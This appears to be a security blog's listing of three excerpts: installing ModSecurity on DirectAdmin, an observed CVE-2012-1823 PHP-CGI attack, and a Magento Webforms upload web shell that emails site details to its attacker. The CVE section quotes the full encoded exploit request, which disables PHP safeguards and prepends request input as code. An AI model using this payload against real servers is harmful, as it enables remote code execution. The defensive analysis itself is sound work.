Install ModSecurity to Directadmin with Custombuild 2.x

Prerequisite: if you don't have custombuild, or your version is 1.x, you first need to upgrade to custombuild 2.x (upgrade instructions: https://help.directadmin.com/item.php?id=555). Update custombuild. Configuration: edit the options.conf file and change these lines to the following. Build the ClamAV scanner (optional: you can use Malware Expert ClamAV signatures and Linux Malware Detect). Build ModSecurity. Mod_Security rules: in options.conf it is possible …

Bot Network Scanners Activated

During analysis of our logs we noticed that an automated attack against PHP is going on, using a vulnerability in PHP. The attacker is trying to exploit CVE-2012-1823; this only applies if your PHP runs in CGI mode (mod_php is not vulnerable to this). POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E Decoding the URL gives: Using the -d parameter …

Magento Webforms Upload Vulnerability

In the ModSecurity audit log we found a Magento Webforms upload vulnerability. Looking more closely at the POST payload, we found this image.phtml script, which is first uploaded to the customer's website. If the index.php / image.phtml file is uploaded successfully, it can be accessed from the web and executed! image.phtml: first it sends an email to fileputcontent@gmail.com notifying the attacker of details like hostname, URL and IP. Then it tries …